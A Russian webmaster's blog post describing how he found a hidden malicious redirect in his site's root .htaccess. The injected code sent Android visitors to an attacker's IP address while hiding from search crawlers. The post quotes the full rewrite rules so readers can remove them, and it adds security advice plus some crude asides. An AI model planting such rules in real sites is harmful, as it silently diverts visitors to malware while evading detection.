Друзья мои, я всех приветствую! На днях я снова взялся за Notepad++ и стал работать над адаптивностью данного блога. Дело шло так себе, но в определенный момент при тестировании с мобильных устройств я обнаружил, что браузер ругается на то, что мобильная версия сайта пытается перенаправить пользователя на какую-то левую страничку с очень подозрительным адресом:
http://5.61.34.53/jquery/htaccess.php
При этом Яндекс.Барузер показывает неприятную для всех вебмастеров страничку: «Сайт может угрожать безопасности вашего компьютера«. Понятно, что это вирус и с ним нужно бороться. В процессе тестирования выяснилось точно, что это вирус, который делает переадресацию пользователей с мобильных устройств (как правило под управлением Android) по вот той ссылке, то есть на сайт вредителя.
Многим известный скрипт поиска вредоносного кода Ai-Bolit как ни странно ничего не нашел. Google и Яндекс также ни чем не помогли. По дате последнего изменения файлов движка также внятного ничего не удалось установить, так как файлы CMS я правлю часто и уследить, что сделал я, а что «вирь» — сложно. Поэтому пришлось скачивать практически весь сайт на локальный компьютер. Н у и первым делом я запустил мой любимый Notepad++, задал «Поиск по файлам» с запросом 5.61.34.53. И самое интересное, что в три секунды подлец нашелся — он сидел в корневом .htaccess.
как, спрашивается, он там оказался и почему я его там не увидел, ведь я лично открывал этот файл в первую очередь?! А так — вирус прописал редирект не просто в конце этого файла, а добавил еще около ста переходов на новую строку и, конечно, быстро просматривая файлы можно просто не заметить эту хитрость. Рассчитано на невнимательность, на чем я и попался.
Итак, вот этот код, который нужно удалить из файла .htaccess который лежит в корне сайта (код начинается примерно со 130 строки):
RewriteEngine on RewriteBase / RewriteCond %{HTTP_USER_AGENT} android [NC] RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC] RewriteRule (.*) http://5.61.34.53/jquery/htaccess.php [L,R=302] # on
После удаления все нормально. Сразу же стоит поменять пароли на FTP и/или вообще в админке хостинга отключить доступ по FTP и включать его когда потребуется. Также желательно не пользоваться для работы по FTP взломанным Total Commander — из него легко уводят ся пароли. Хотя если честно, то пароли увести можно откуда угодно, но лучше уменьшить этот список, хотя бы, не пользуясь для работы с сайтами ломаным и хаканым софтом.
Конечно, этот код может быть и несколько видоизмененным и не обязательно он будет вести на сайт с вирусом. Я встречал жалобы, что примерно такой же код встраивали конкуренты для перенаправления на свой сайт. А еще так SEO-шники балуются, накачивая мобильный (и не только) трафик на свои говно-блоги, за что и перестрелял бы их всех без суда и следствия.
Также замечу, что CMS, на которой работает сайт в целом не важна: ломали как и WordPress, так и Joomla, так и «Битрикс», и Drupal.
Ну вот и все. Здоровья вам и вашим сайтам.
14-го февраля нормальные люди отмечают праздник Трифон Зарезан — день виноградарей. Т.е, бухают винчик. Никаких подарков, баб. Винчик и всё.